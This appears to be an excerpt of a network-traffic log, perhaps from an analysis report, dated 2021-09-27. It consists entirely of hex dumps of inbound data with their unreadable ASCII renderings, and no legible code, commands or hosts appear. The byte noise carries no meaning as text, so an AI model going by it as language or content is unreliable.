                                          Data Ascii: _nlleM/nT,Bf_tEJ$:u^:KWtjCq}%3v~_(18U#cNtm[eKamwJdc>??pKKZEcW\@<J:e2XbRw+'! -Dz%e25F'DW$#[YWLHAE
                                          2021-09-27 15:30:10 UTC59INData Raw: 8f 1c d7 c9 e8 72 d6 5f 87 43 63 f6 15 4b a9 b0 9d 5a ce 26 a0 f6 fa 9c 38 b4 db 9d 61 90 b9 88 83 58 89 bc d1 3b 29 e2 39 21 9b 03 be c9 fe dd c1 42 3e 21 81 14 80 a9 dd a6 36 20 05 b6 65 89 20 30 fa 98 dc 3a 8f 4f 67 d3 4f 5e e2 6e 54 e0 00 df 3f dc 00 ac 49 27 15 9a 36 c3 a2 85 2c ad 4b 5c d2 f7 8a 6a 29 d1 8b e3 cd 06 3d 6c b7 06 8b 15 4d a9 25 82 7c d6 53 8e f8 2d 8c 89 6c a5 77 e2 50 b7 7a f7 9e aa 03 26 1d 30 84 7a a7 89 3d 1f 83 20 27 70 0c df d7 7a 10 1a 47 10 4c 37 d1 1d b2 f9 1c ea e3 5d f5 e5 6d e6 0e c2 f4 ff 5b 44 f2 39 9a a0 19 90 25 26 99 96 8d 57 bf d5 45 4d 62 6c 55 34 f3 90 92 bb b7 49 a1 2a 29 d8 bc ce 8d 81 5a a1 85 10 f0 13 9f 1e 8e 16 90 83 0d fe c5 02 9b 2e 2e 73 48 34 71 08 de a1 5a da 06 20 74 65 7e 1e 56 41 23 46 ac be c3 93 f0
                                          Data Ascii: r_CcKZ&8aX;)9!B>!6 e 0:OgO^nT?I'6,K\j)=lM%|S-lwPz&0z= 'pzGL7]m[D9%&WEMblU4I*)Z..sH4qZ te~VA#F
                                          2021-09-27 15:30:10 UTC60INData Raw: c7 9b e0 f0 b5 5c c4 6c 3d 01 4f cf 28 95 fc 80 1f f1 1c 82 0f ea 37 ab 70 8e bd 25 85 59 60 c8 44 c0 6a cb 15 c0 d0 7d fc 41 45 f1 67 60 a5 cb 18 04 95 17 f7 25 fd ae 0a 48 5d 77 88 49 b1 c5 e1 c5 b3 36 54 41 51 63 ee cb 5f f9 b9 ec c2 28 6a 22 2a 96 74 aa 9b 05 c7 e0 6f 33 3a 41 d1 7f 4c 85 d1 fa 15 41 42 38 b1 ab 7b b6 71 ca 1e 7d cc b2 cb 25 c2 20 76 1a 7e 1f c6 dc 5f fc fd 29 c4 24 e3 ed 38 da f2 e2 17 9f 7f 27 63 c2 e7 f9 10 7c f1 87 5f 8c db 9e 4c 85 1e e1 ea 65 50 60 5f a7 49 ea db 48 90 7c 3f 0d b4 c0 28 1e 0a 19 60 ce cb b6 73 86 e9 22 5e 53 76 8b b6 03 9d 5f 93 d9 30 a5 c5 7a a2 13 81 86 0f f4 f1 c7 67 0c a4 92 26 71 a5 93 b0 18 c7 6f 23 58 1b d1 e2 7a 5f ec 09 9d 3c 00 95 2a 55 31 bb 8f df 2c a7 71 d4 55 27 98 6a 46 d8 00 97 00 aa 07 0a 47 54
                                          Data Ascii: \l=O(7p%Y`Dj}AEg`%H]wI6TAQc_(j"*to3:ALAB8{q}% v~_)$8'c|_LeP`_IH|?(`s"^Sv_0zg&qo#Xz_<*U1,qU'jFGT
                                          2021-09-27 15:30:10 UTC61INData Raw: c8 4b 5b 73 57 c3 ca 01 f0 2b b6 8a 7a d6 78 e7 45 cc 9a f9 b0 2c ff 03 c1 48 c4 fb 0f a7 7a dc da e7 63 b6 7f 86 52 6f fa 19 a4 ae 88 bc 7b db 23 94 b7 68 90 2b b2 da 9f 6f 99 4f 9f d1 35 a1 92 d7 99 3e e1 34 26 b5 cb ae cf e8 32 c6 7a 13 23 59 09 95 b8 50 b0 30 3a fa a4 41 9d 3e 2b f6 07 51 3a 9e 48 dc 3c 46 66 f0 44 8f e5 1a c6 28 da 05 82 7c 2a eb 9d 0d 46 ac 92 fa a1 47 5e d0 f9 9c 05 4a cc 75 e6 43 1b 24 7c aa 41 a2 15 4d a9 38 9a 7b f8 78 9b fe 35 65 05 47 b8 70 eb 6b 5d 6a ff 82 a5 ee 82 ce 31 85 d2 9e 55 28 0b a1 c0 02 70 06 c4 da 71 31 25 45 10 5b 27 4b e4 b3 d5 1e e6 e4 4f dd 57 6b f0 fa b7 55 fc 4c 56 e7 3c 9a a3 0f 8d d2 a9 02 fb 8a 53 87 ee b6 9a 0a 44 12 3f fb f5 af fd b6 43 b8 29 10 ba 95 52 87 ee 45 ab 5b 0b fd 5d a9 1e 84 73 96 85 19 ff
                                          Data Ascii: K[sW+zxE,HzcRo{#h+oO5>4&2z#YP0:A>+Q:H<FfD(|*FG^JuC$|AM8{x5eGpk]j1U(pq1%E['KOWkULV<SD?C)RE[]s
                                          2021-09-27 15:30:10 UTC63INData Raw: ab a2 3d cb 1e e5 47 e2 36 e6 c5 db 4c 02 ff 95 f7 a6 ca 1a 6f 2a 03 05 40 0d 98 bc 7b d6 9a 90 f8 a1 c0 d3 6c 33 2a 36 45 38 92 e9 7a 6a 02 3e 80 0f 70 35 a5 7e a2 83 ee 96 5e 79 81 4c 42 6a cd 04 55 d0 7d 8c 42 51 6d 70 76 b3 f2 3d ac 97 16 f7 bf 83 8f 17 61 7b e6 81 61 f2 5d f0 c4 c3 36 40 dd 46 63 e0 e9 26 73 a9 eb d7 da 69 9b 13 a6 6b 87 b1 96 cd 93 d5 af 2b 4c c2 79 54 7a d1 f0 cb df 54 15 a6 ae 6d 2a 60 8c 1d 4d ec 32 cb 25 c2 ae 67 1d 61 38 d1 40 4e d3 e3 1b e4 ce e3 ed 38 5c e3 e5 09 bf 59 bf 72 f2 f9 cd 30 7d f1 87 4e 06 d9 92 6b 22 3e 61 ea 65 41 f7 54 5e 57 f0 b8 e8 90 78 3f 91 28 ec 37 29 1d 8f 67 c5 c2 83 54 14 75 33 59 5a 5c 93 ce 8c 85 5a 85 8c ce c5 59 61 b6 04 b3 8e bb 65 c8 84 7c 30 bd ef b2 0f 49 8d 8d 0d b1 f9 23 55 12 c0 a8 72 ed ff
                                          Data Ascii: =G6Lo*@{l3*6E8zj>p5~^yLBjU}BQmpv=a{a]6@Fc&sik+LyTzTm*`M2%ga8@N8\Yr0}Nk">aeAT^Wx?(7)gTu3YZ\ZYae|0I#Ur
                                          2021-09-27 15:30:10 UTC64INData Raw: c0 d6 45 77 5e fc d6 97 8f af bc 93 bf b1 34 f8 d3 b5 34 cd 06 95 e7 ee cf ae d5 8f 5f db a6 4a 69 41 6f 91 05 e1 3b 07 9d 58 0b 50 bb 41 cc 8d 5d ba c8 e6 07 90 5d c0 92 64 b6 60 cf e1 bc 7b a5 7f 24 52 73 f6 1a 72 81 a6 b5 74 d9 21 b7 e8 64 8e 2e a7 ce a5 58 90 a4 8f e9 a6 9a b1 c4 9c 29 e7 42 87 b2 cb b5 e5 ed dd c2 47 1b 67 37 15 86 b4 24 b3 36 20 1f b6 61 89 24 0e 14 14 57 3c 9c 49 d4 d6 50 9c e5 52 8d f5 11 c0 a0 6d 26 43 72 26 3d c6 25 4e a3 ea 9e ad 58 5e eb ee 9c 14 46 c2 83 f6 67 78 46 79 a3 24 93 01 4d a3 35 ac 7c fe 78 80 cb 38 8a 0e 7a ad 5f 7f 43 bf 61 90 ac bf 8f ac 25 8a 85 d8 b6 90 2f 1f 83 6c 24 70 00 d9 5c 69 38 36 42 03 5c 30 4a 0c a3 f1 35 ef f7 49 d7 e4 7c f0 17 a1 68 e8 4f 51 f6 b1 a4 a5 10 87 3f b0 3f e1 b7 41 23 ce 51 4d 56 6c 55
                                          Data Ascii: Ew^44_JiAo;XPA]]d`{$Rsrt!d.X)BGg7$6 a$W<IPRm&Cr&=%NX^FgxFy$M5|x8z_Ca%/l$p\i86B\0J5I|hOQ??A#QMVlU
                                          2021-09-27 15:30:10 UTC65INData Raw: 75 05 4f 00 7d 03 c8 09 c4 f3 58 d4 eb dc 5b 19 fb ab e3 c4 c1 8a 68 b5 3c 1b f0 22 06 9d ac bf cb 18 f6 d4 e5 22 ed a9 ef d2 13 fe 99 c7 97 24 0e 47 41 9b 14 41 0b 34 ad e7 c7 9c 9c f8 a6 7e d4 7a 22 21 31 d9 29 9f 54 4f 68 95 28 0c 30 ec 24 a3 c3 96 b7 6a 96 4b 4e b6 6c c2 60 6f 15 eb d2 59 82 46 53 e5 78 fc 83 da 1d 2d 84 32 e6 07 84 9f 94 59 7f 71 97 fd e3 e5 f9 d4 40 0d 72 56 7f c3 ff c2 3a c9 a9 c8 de 66 53 0c 13 82 62 30 b9 07 cd 93 df 20 34 5a f9 4f e4 a9 da e1 e8 5b df 3a a8 81 7b bc 62 99 13 6c d8 9a 48 27 c2 34 60 97 79 09 c7 dd 4b c0 e8 3e ec 96 e3 ed 32 e6 e3 f3 02 a4 23 27 63 f3 f0 74 17 fd f1 86 5a 8e dc 82 5c b0 1e e1 e0 43 50 65 52 d4 4f c6 98 69 83 5b 2e 2e 2f fd a4 21 0b 13 77 60 cc 98 5f 69 47 22 5e 4f 45 5c a0 10 94 d1 a5 b6 d1 a5 d3
                                          Data Ascii: uO}X[h<""$GAA4~z"!1)TOh(0$jKNl`oYFSx-2Yq@rV:fSb0 4ZO[:{blH'4`yK>2#'ctZ\CPeROi[../!w`_iG"^OE\
                                          2021-09-27 15:30:10 UTC66INData Raw: 43 b9 4a 16 c6 2d 90 9b 8c 1c 83 95 16 dd a3 3e 9b 28 4b b4 49 33 51 25 cf b1 45 f2 56 24 74 76 11 d9 a4 41 38 65 68 be c2 88 d1 2a 49 36 2d 36 5a 7e 0c d3 db b2 be 52 00 14 e9 31 41 dd 4b 46 77 28 86 ab 92 be f7 60 80 28 b2 b5 57 9e 69 39 d6 aa c0 ae d6 9a d5 a7 b1 09 6f c3 4d 91 b5 6b f1 1e 6c af 7b cd 97 da 42 fa cf 22 d4 1a ac 68 24 9a 43 79 e0 86 31 92 44 e1 7c 58 e6 79 aa 09 01 65 a5 72 74 1f 0b f3 e3 41 e5 83 df b7 0c e7 ce 0f 72 39 24 ed 06 e9 70 b3 74 e8 14 69 15 7d 1b c8 09 c4 c4 22 58 d4 d6 4c ce 60 a8 5b c4 c0 93 4a 8c 3e 18 f1 bc 12 b5 82 bc d8 3d f4 f8 e5 20 e1 56 f2 d0 13 f9 28 c6 a5 21 32 c1 2a 9f 1e 58 6d 35 95 e7 c7 9c 99 f2 45 5d c2 61 16 55 df 26 d6 82 e5 53 5b 9a 2d 96 37 4e 25 a2 61 96 98 4b 1c 58 66 a7 7d d1 53 59 05 c9 c1 6b 9c 4d
                                          Data Ascii: CJ->(KI3Q%EV$tvA8eh*I6-6Z~R1AKFw(`(Wi9oMkl{B"h$Cy1D|XyertAr9$pti}"XL`[J>= V(!2*Xm5E]aU&S[-7N%aKXf}SYkM
                                          2021-09-27 15:30:10 UTC67INData Raw: 98 81 be 03 da 74 20 63 a5 20 b8 77 59 d9 09 9b 1c 08 89 09 6d 20 b0 9c ff 2d 8d 52 fc 3a 39 98 6c 6c c2 13 9c 06 bb 0c 1d a9 57 06 32 13 06 b5 f6 fc 37 d6 92 d9 b7 41 37 5b 58 ee 25 0f 51 36 29 9d 4c a3 a0 35 43 6d da 00 13 a6 8e 95 e4 a7 12 eb e2 a2 d9 81 e8 31 41 b8 60 b3 f7 c6 2f e8 d3 fb fa fe 69 c4 8c c5 a6 0f f3 b1 8d 9c 5c 0c 17 7c d7 8c 39 8c e4 23 4c 7c 28 1a 71 45 2f d4 10 7a 7e e1 79 14 d2 7f a5 c3 28 69 d7 ca d1 2c f8 28 61 48 8a 5f 1b de ad 48 32 56 2f d6 ab 6a 63 43 09 24 a4 7a 6e df 1b 58 b4 55 ef b5 8a 3d cf c5 c5 31 07 58 5f e8 c1 cd 7f 66 a0 45 c1 69 8e 42 e3 aa b8 9b 1a fa a0 91 3d be ba 86 ed fe 48 a4 cf a7 e5 c8 bc 51 60 52 6f e4 03 e1 3b a9 a4 6c 1e 78 e1 56 c8 9a fa 83 a6 fa 2f cb 71 e4 94 c6 ad 52 e7 c9 e2 75 89 69 97 46 41 91 17
                                          Data Ascii: t c wYm -R:9llW27A7[X%Q6)L5Cm1A`/i\|9#L|(qE/z~y(i,(aH_H2V/jcC$znXU=1X_fEiB=HQ`Ro;lxV/qRuiFA
                                          2021-09-27 15:30:10 UTC68INData Raw: 86 36 a8 2e f8 ba 66 b9 df 28 65 f5 6c c5 3e fb ee f4 db b6 43 b8 23 31 b3 61 53 8d 8b 43 ac 59 29 b3 3a a8 14 9d 19 92 82 08 f0 fb 2b 9e a0 93 c2 be 32 5b 02 d5 a7 5d 00 11 f6 f9 2f 7e c0 a4 4d 23 5a bd bb d4 99 c5 b2 e1 37 ed 4a b5 6e 18 cf ce eb dc bc 19 c2 f0 3a 6e 85 5e 5c ba 1e b2 a4 b4 99 98 49 91 2f a0 ae 71 b1 e4 3e dc 74 c1 bb de 8b f7 b1 a1 01 e3 fc 4d 91 b4 c9 ae 72 78 96 cf cd 97 d1 79 90 cd 22 ec 32 46 69 b5 90 6b bc f7 8d 10 a1 60 e6 6b ac 88 71 aa 11 0c 74 ba 73 5c 0d 3f e0 fa 5d 68 83 c7 49 0c d8 ea 35 56 04 d6 dd 1d d6 70 b9 77 62 63 4e 01 5f da dd 08 ce d1 28 d4 eb cd 7c cc 76 46 e2 c4 c0 0b 66 a3 3e 65 5c 31 15 bf 88 95 e5 1c e5 dd e0 35 d1 f4 cf d0 15 f4 f9 cc 87 35 1c 64 02 be 10 47 14 91 89 e7 c7 97 a7 a2 b3 5c c4 43 08 09 20 d3 01
                                          Data Ascii: 6.f(el>C#1aSCY):+2[]/~M#Z7Jn:n^\I/q>tMrxy"2Fik`kqts\?]hI5VpwbcN_(|vFf>e\155dG\C
                                          2021-09-27 15:30:10 UTC70INData Raw: 0a d6 41 65 8a 88 99 90 5d 9c 9e 46 a7 c5 76 c2 e7 89 91 d3 96 24 82 63 06 b4 8b 41 e0 4f 92 ba 05 0e 76 20 41 09 c6 90 53 71 ee 77 64 17 1b 8c 29 44 24 df 96 23 2d 81 03 fd 79 25 92 03 dc c3 13 96 13 bc 1d 1a 94 77 78 0e 05 04 bf fe e2 33 b9 92 c1 b7 4b 4d 41 6a ed 2f 4c e1 37 29 8d 5f a4 a0 30 6d 40 96 e2 13 ac 8b 94 bf 16 19 ec e7 99 a8 90 ef 33 46 26 05 6d e7 ee 12 93 d1 f3 d2 da 04 76 8b cf 84 1f e2 b1 87 48 4f 0c 2c 7b ea 89 e4 3a e4 23 4c 75 36 75 10 5e 2f de c1 7c 4e e3 78 15 c6 7f a5 cc 1b 79 d7 da f2 9b e3 28 6c 77 7d 5f 37 da a6 46 19 58 28 2e de 54 61 54 19 37 a6 73 95 f6 3f 5b 9f 51 d7 5e 99 36 88 c4 c5 31 07 5a d0 e9 c1 dc 62 06 d3 df c2 69 88 dc ea bb a0 bb 25 fc cf 97 34 cd 0a fd ee f6 42 b1 ba a5 5c c8 ba 4a 7a 46 4f de 29 6b 39 a5 8a 54
                                          Data Ascii: Ae]Fv$cAOv ASqwd)D$#-y%wx3KMAj/L7)_0m@3F&mvHO,{:#Lu6u^/|Nxy(lw}_7FX(.TaT7s?[Q^61Zbi%4B\JzFO)k9T
                                          2021-09-27 15:30:10 UTC71INData Raw: 27 27 bd 11 66 2d 4d 1c af c7 eb fe f7 49 c2 54 7e ee 04 a7 71 e4 a5 44 cd 35 9a a2 08 99 47 34 32 ea a9 56 ae d7 56 70 0b 6d 79 35 f3 e7 e8 93 b6 43 b8 31 2e cf 9c 52 9c 89 4c 54 5a 2d dd 2a af 07 92 80 9e 97 11 f5 fc 32 84 27 da ac 64 39 4a 0f c2 bf 12 46 19 2a 67 78 7e d1 ad 5f cc 5d 80 b4 d3 8f db 23 18 a3 e4 2c 51 67 18 d4 e0 fc bb ba 19 ee f1 21 7d fb 70 57 64 05 88 99 90 91 98 52 8a 32 4a a5 75 80 f5 39 c1 b5 93 21 ef 98 ff b1 b1 19 fc f2 b3 90 98 ce f6 2f 7e 98 da de 9f d0 7b a8 d0 29 20 33 6a 6e 35 97 66 b2 ed 95 33 ba 71 e9 6b ac 88 71 ab 11 14 7c bd 74 aa 13 1f 1c ec 7a 7a 86 51 00 1a 2e ff c8 d9 04 35 f5 8b c5 75 ac 78 59 0d 4f 10 5d ad 36 08 e2 d0 1c 59 c0 d6 4c ce 65 87 fa d7 c8 99 77 ab 32 e8 e7 1d 1c a4 85 a7 d4 3d 79 c5 e0 39 f9 cb c5 cf
                                          Data Ascii: ''f-MIT~qD5G42VVpmy5C1.RLTZ-*2'd9JF*gx~_]#,Qg!}pWdR2Ju9!/~{) 3jn5f3qkq|tzzQ.5uxYO]6YLew2=y9
                                          2021-09-27 15:30:10 UTC72INData Raw: 1e e0 fe 71 55 43 e6 59 48 cc b0 f4 90 78 35 1e 32 fa 20 0a 23 8b 72 c2 db ad c6 46 e9 22 5f 51 71 98 88 b3 94 5d 90 a2 f9 72 c6 70 b7 0d 05 96 d9 f9 d8 97 77 18 8a 20 2e 1e 44 ba 2c 12 d4 6f 1a cb 09 fe b1 7a 7e ef 09 9d 05 11 97 2a 7d af b1 96 2b 00 b4 69 f6 53 aa 99 6c 66 ef 25 ef 22 b9 0c 1b aa 59 17 3e 2d 93 b1 f6 f5 58 fc 90 c3 b1 50 3a 51 63 82 01 21 51 30 38 8b 5d a9 de 11 42 45 a8 11 1f bd 82 ed 1a 3f 19 ea e0 9b a1 ee fe 3a 57 28 b4 62 c0 c6 2f e8 d3 fb c1 dd 43 fc 8a cf 84 e9 f3 a0 82 55 8a 19 38 6c c2 9d 36 b2 4f dd b3 9b ee 0b 46 77 18 d4 11 63 5d ed 7f 30 fa 47 a5 c6 22 b7 c4 da f0 0e c9 28 66 1e 40 5e 37 dc b5 43 32 db 39 28 aa 71 60 54 02 e5 a2 62 90 d1 37 5a 9f 4d c4 56 89 3e a0 58 c5 7a 0d 72 5f 7e c0 d6 4f 82 a1 fd c0 78 8e cf e3 b0 a9
                                          Data Ascii: qUCYHx52 #rF"_Qq]rpw .D,oz~*}+iSlf%"Y>-XP:Qc!Q08]BE?:W(b/CU8l6OFwc]0G"(f@^7C29(q`Tb7ZMV>Xzr_~Ox
                                          2021-09-27 15:30:10 UTC73INData Raw: 0a 74 ae 57 61 43 bf 6b 63 99 b3 90 a6 3d c4 85 d8 b6 1d 38 05 b4 e5 39 1b 9a df df 71 36 29 0f 8c 5b 2f 43 15 92 12 1d fe f7 d5 cc 48 7e e3 03 c5 f4 fe 5b 43 f2 38 55 b1 35 ae 1b a8 2e f3 b2 50 b9 d3 61 5d f5 6c 5f e3 3c ff 87 ba a6 47 9a 7a 3c dc 92 3d 0a 80 50 ac 4d ff d4 2a ac 71 06 1d 83 82 0f 0b ef 2c 65 2f 44 81 4a 35 71 1e cf a4 25 52 07 20 72 67 a4 d3 aa 52 3b 64 24 be c2 88 d1 38 47 36 d3 b8 46 6f 1e aa 62 e2 af 42 0b ca eb 2d 7b 9d 72 a0 67 0f 91 e3 09 98 98 45 91 25 a5 a0 48 80 cc a0 d2 aa c7 d2 7e 8a f7 b7 b3 16 90 f4 4f 91 b2 da ec 14 ef 87 d5 c7 86 dc 7b a7 e7 44 df 32 4c 60 35 95 04 a7 e3 86 3d d5 75 e0 7c 58 9a 57 db 2b 05 74 bb 76 a9 1d 18 ca 72 52 68 82 b0 9d 0f f4 ee 0f 5f 3e 38 9a ae d4 70 b5 64 41 14 45 6e 73 b7 c8 0f df d0 13 dc 84
                                          Data Ascii: tWaCkc=89q6)[/CH~[C8U5.Pa]l_<Gz<=PM*q,e/DJ5q%R rgR;d$8G6FobB-{rgE%H~O{D2L`5=u|XW+tvrRh_>8pdAEns
                                          2021-09-27 15:30:10 UTC75INData Raw: c7 f3 38 cb 27 f2 e8 9a d1 fd f1 06 9d 5f 37 77 e2 6b d6 10 fd f0 94 5f 8b d9 83 63 8b 0f f0 fd 4d e6 6b 45 53 6e d7 89 7e 00 54 20 1c 29 fd b2 36 1a 13 76 c8 0d ae 4b 41 e8 0a 4a 45 65 86 88 24 95 5d 90 c2 c4 a4 c5 71 a2 1e 99 96 cd d1 7c 87 63 0a b5 0e 29 1e 4e 93 a3 02 c5 75 24 7a ab fa b7 54 d3 ff 19 8f 02 0f ae 82 55 20 ba 82 09 8a 8f 78 fa 6d a8 9f 6c 6c c3 07 88 14 93 af 1d b9 5f 2e ae 05 04 bf e5 fa 26 d1 86 eb 12 45 36 46 7f 60 22 23 51 37 3a 97 5d b3 a7 1f e8 41 ae 06 b1 bd 9b 96 26 29 31 4f e6 8a a7 95 c0 9c 53 22 6c 7b 68 e9 18 e8 d2 e5 c6 c4 43 67 8a cf 84 1f 6f b1 87 48 4f 02 2c 74 eb d5 28 85 cc ac 4d 64 3a 37 33 4e 27 f8 5d 78 46 cb f6 3c d2 75 88 85 5b 4b c4 dc dc 14 e9 39 6c 4e 7d 76 20 dd b5 45 5d 75 3b 28 ac 57 6b 45 0a 0c b4 63 90 d8
                                          Data Ascii: 8'_7wk_cMkESn~T )6vKAJEe$]q|c)Nu$zTU xmll_.&E6F`"#Q7:]A&)1OS"l{hCgoHO,t(Md:73N']xF<u[K9lN}v E]u;(WkEc
                                          2021-09-27 15:30:10 UTC76INData Raw: 5e 42 eb d1 9c 14 46 c7 cb ca 6d 17 35 67 be 23 43 1d 52 aa ca 85 44 e7 a8 d6 f8 2b 9a 2c 7f a5 77 e9 2c a2 69 ff 82 b9 e0 b4 1f 30 8f d4 a9 8b 24 0b a2 f7 2c 8e 07 e2 c4 6a 10 01 46 10 4c 37 74 34 b2 f9 17 e8 b7 fd dc 46 6d f9 0f bb 79 f6 44 49 1f 3d a7 ad 28 59 2d a8 2e e6 ac 5b bf d6 56 7f 0b 6d 79 30 2b e0 87 ba b5 6b a6 2e 38 d6 98 4d 96 8c 50 a3 42 ff d4 17 a6 1d fd 14 81 84 13 9a e4 38 9b 24 2f b7 45 33 52 17 d1 5e 4b f6 0e 18 d0 71 7e c0 ba 51 3f 5c a5 a1 d2 76 c1 10 44 3b d3 1c 47 6f 1e d3 c0 cd af 44 12 d4 c9 22 75 85 57 56 6d 10 84 72 82 b5 8d 47 aa 12 b1 a4 5f 9f cc 10 d6 aa cb ab b4 1e f7 b1 a0 0e f7 f1 4d 98 ab d4 1e 3d 54 89 05 d1 97 d0 68 88 db 22 de 38 4a 76 3a 9d 6b a4 fb 78 3a 96 76 e5 54 61 8c 5d ae 21 33 71 bd 63 cd 74 13 e2 e7 a8 63
                                          Data Ascii: ^BFm5g#CRD+,w,i0$,jFL7t4FmyDI=(Y-.[Vmy0+k.8MPB8$/E3R^Kq~Q?\vD;GoD"uWVmrG_M=Th"8Jv:kx:vTa]!3qctc
                                          2021-09-27 15:30:10 UTC77INData Raw: 65 93 da db d0 43 42 05 47 80 57 b4 69 80 02 7a da 4c ca 09 c0 25 7d 1a 79 11 39 dd 73 d6 d7 2b ef d2 e1 96 54 c0 f2 e6 3c ae 4d 20 1e 99 e6 f9 14 d7 f1 87 4e 89 f8 97 74 3f 1e e1 ea f4 41 6b 54 4f 43 ed 83 68 97 6f c1 0c 15 e9 30 15 0b 14 60 3c dc 97 49 56 e2 22 59 5d 9b 8d 8c 12 bf 5f b1 55 d3 df a8 70 b1 1f a2 a7 db fa f1 92 63 0c a8 fe 43 1e 4e 96 9a 12 d4 76 02 50 0d d6 b7 52 71 48 09 9b 07 0d 8d 0a 4e 20 b7 81 df 2c a7 7a e4 70 25 9f 7a 92 c3 3f 9e 17 b0 0c 1a a1 ab 07 1e 07 2f b7 dd 10 35 ad fc c3 b7 45 1c 62 6a ee 58 4d 51 36 2d ad 4a 89 b1 24 70 41 ae 82 13 ac 8b 82 32 3d 19 ee ce 9d ad 81 e2 38 7a 29 42 53 e0 ee 1e 9b f5 f3 d2 da 11 c6 89 e7 14 33 f3 b7 57 57 5c 0a 3c 55 d3 8c 39 86 8b 04 4e 64 3a 32 ff 5f 2f de 7e 76 4f e3 7f 3f a1 2e a4 c6 2e
                                          Data Ascii: eCBGWizL%}y9s+T<M Nt?AkTOCho0`<IV"Y]_UpcCNvPRqHN ,zp%z?/5EbjXMQ6-J$pA2=8z)BS3WW\<U9Nd:2_/~vO?..
                                          2021-09-27 15:30:10 UTC79INData Raw: 14 5f 3a 8f 5f d3 c9 6c 51 f6 41 8b 1f 01 f9 2c c2 1f 84 64 35 eb 9d 0d 4c b2 8e 2c ab 40 aa c2 d3 9e 3f 4e fa 68 e5 14 6b 35 78 a7 04 61 16 4e de 48 84 68 fa 52 8a f8 2b 88 34 69 a5 5f e3 43 bf 63 ff 88 ac 99 a1 36 2b 85 df a1 7f 28 27 a9 f0 2d 70 01 d8 2f 6f 14 34 54 1b 4a 26 44 e4 b3 d5 1f d5 f5 62 3e 44 16 9b 04 b6 7d d5 79 47 e2 41 f6 a5 10 82 06 a8 2e f9 b2 66 bd df 61 65 f5 6c 5d 3e fb ee 91 b1 9c 58 b2 29 2f 22 95 7e 8f 99 5b aa 5c 17 2b 3a 84 1c 99 17 83 83 01 0b ec 16 99 05 26 86 ab 31 20 76 de a0 4e f0 24 22 77 0d 00 c0 a5 45 18 66 ae 96 d5 88 c0 36 54 28 86 a6 42 6f 1c ef fb d3 ad 44 30 c2 fa 29 62 94 5a 47 72 04 bc 97 83 9e 8f bd 83 04 b6 bc 52 89 e3 28 28 ab ed bf e3 80 f7 b6 b8 ef e2 d0 4f ba b6 e2 03 3e 03 f8 d5 cd 93 fa 48 a2 cc 5f a1 32
                                          Data Ascii: _:_lQA,d5L,@?Nhk5xaNHhR+4i_Cc6+('-p/o4TJ&Db>D}yGA.fael]>X)/"~[\+:&1 vN$"wEf6T(BoD0)bZGrR((O>H_2
                                          2021-09-27 15:30:10 UTC80INData Raw: 1a 49 6d 48 43 63 c4 2f c2 a7 99 54 f0 60 29 1e 3d 72 b5 be 36 46 93 d5 33 a6 4d c2 67 6b cc 4d f6 d4 72 53 8e bf 9e 49 96 ad 8b 02 7d 50 b4 d4 16 dd 3d ea 1c 61 3d d8 ec c3 d2 e3 1c e4 91 e3 ed 38 5c f4 fd 20 ac d1 23 63 f5 7a ff 0f ca d1 7a 4e 9a c8 09 72 08 26 fe e3 f9 47 74 7c 79 cd c6 98 68 0c 7e 20 37 19 1a 28 1e 0b 8f 70 dd e6 9b 83 41 e9 22 c2 43 7a b0 80 ba 94 5d 9a 2a d7 bb f8 6f c4 87 8e 8e e7 d9 18 83 63 0c 3e 85 31 21 50 0e b6 0d 94 7e ae 54 12 bf a8 2b ed e8 16 d9 01 87 80 3e 16 00 52 96 21 2d 17 7e e3 3f 05 0f 6c 6c c2 8f 9a 1f fe 2c c5 b9 55 06 ae 03 1b f3 d6 5c 37 d6 92 5f b1 5e 71 60 e8 ed 25 23 cd 30 36 cf 53 9b 2d 31 5f 0c b1 60 8f aa 94 c8 2d 36 85 ea f9 c1 b2 f0 74 3d 48 6e 75 63 79 e8 07 a5 cc 99 4e d6 74 8a 95 9c 12 31 ec fe 98 35
                                          Data Ascii: ImHCc/T`)=r6F3MgkMrSI}P=a=8\ #czzNr&Gt|yh~ 7(pA"Cz]*oc>1!P~T+>R!-~?ll,U\7_^q`%#06S-1_`-6t=HnucyNt15
                                          2021-09-27 15:30:10 UTC81INData Raw: 39 c6 2f 22 bf cb b7 d0 0a cd eb 54 3d 0a ae d9 ae 29 50 a1 3c 27 1e a2 e3 2f 32 fc 82 07 56 3a 85 64 c5 c2 47 59 c6 43 9c 14 00 d5 2e 76 14 84 72 35 18 b7 62 4e ac 9d d2 ad 74 51 c7 eb cd 0d 41 d1 82 fe 91 16 19 72 a1 06 72 14 4d a9 19 ae 72 f3 78 83 ef d5 9a 28 69 bd 7a e3 4a a5 95 fe a4 b9 99 80 06 3d 85 d1 a0 7f 28 27 a9 ff 2b 70 0f d5 2f 6f 14 34 68 12 61 9a 2f 33 b0 f9 17 f5 f0 26 f7 44 6d ec 06 d9 52 fd 5b 4f e6 53 a1 a7 10 8c 04 13 2a f9 a7 7e 57 de 49 6f f1 3c 59 2c f9 d7 da ba b7 49 9a 92 3c dc 92 7a a9 81 50 a0 73 71 d4 3b ae 1a 86 34 1f 84 19 ff bc 12 00 2e 24 a7 60 f7 59 08 d8 88 79 db 06 2a 5c 5c 7c c0 af 42 1a 98 ae be c4 a0 e7 3c 56 35 94 08 40 6f 12 c2 87 c9 ad 44 12 d5 95 07 68 94 50 51 0b 25 95 8c 89 8e f7 6c 80 28 be a3 36 a3 e6 3e dc
                                          Data Ascii: 9/"T=)P<'/2V:dGYC.vr5bNtQArrMrx(izJ=('+p/o4ha/3&DmR[OS*~WIo<Y,I<zPsq;4.$`Yy*\\|B<V5@oDhPQ%l(6>
                                          2021-09-27 15:30:10 UTC82INData Raw: ca 47 5d c4 dc d0 2f 5e 2c 66 59 62 76 19 dc b5 49 24 62 32 21 82 f8 65 54 04 4b 6f 62 90 d4 30 4b 93 38 f0 54 88 34 88 e7 c1 31 0b 64 77 c6 c1 d6 45 75 93 f6 c9 41 4e cb e3 ac c6 7f 34 f8 aa 90 27 c1 6f b2 ef f4 48 93 14 8b 5e ce aa 73 5d 57 47 c0 17 d2 36 ac a4 80 18 78 e1 2a 00 8b ff a1 d5 ef 23 a2 6d c2 94 cc 8f b9 d2 c9 e4 69 8d 57 86 43 63 f3 20 51 a6 8c 71 76 ca 20 c9 2d 77 9b 32 b3 cb 82 06 b5 b3 9e f7 14 4c b8 d5 9f 2e c2 03 35 b3 c1 a9 fa ff c5 ef 90 12 08 83 7b 4a be 50 ab 31 31 08 ca 59 9a 28 2c c5 d3 53 3a 89 58 ed ec 47 4a fc 50 af ea 09 fd e6 de 14 82 0c ef 15 9c 2b 66 6c 81 2c aa 5f 45 cf 90 a8 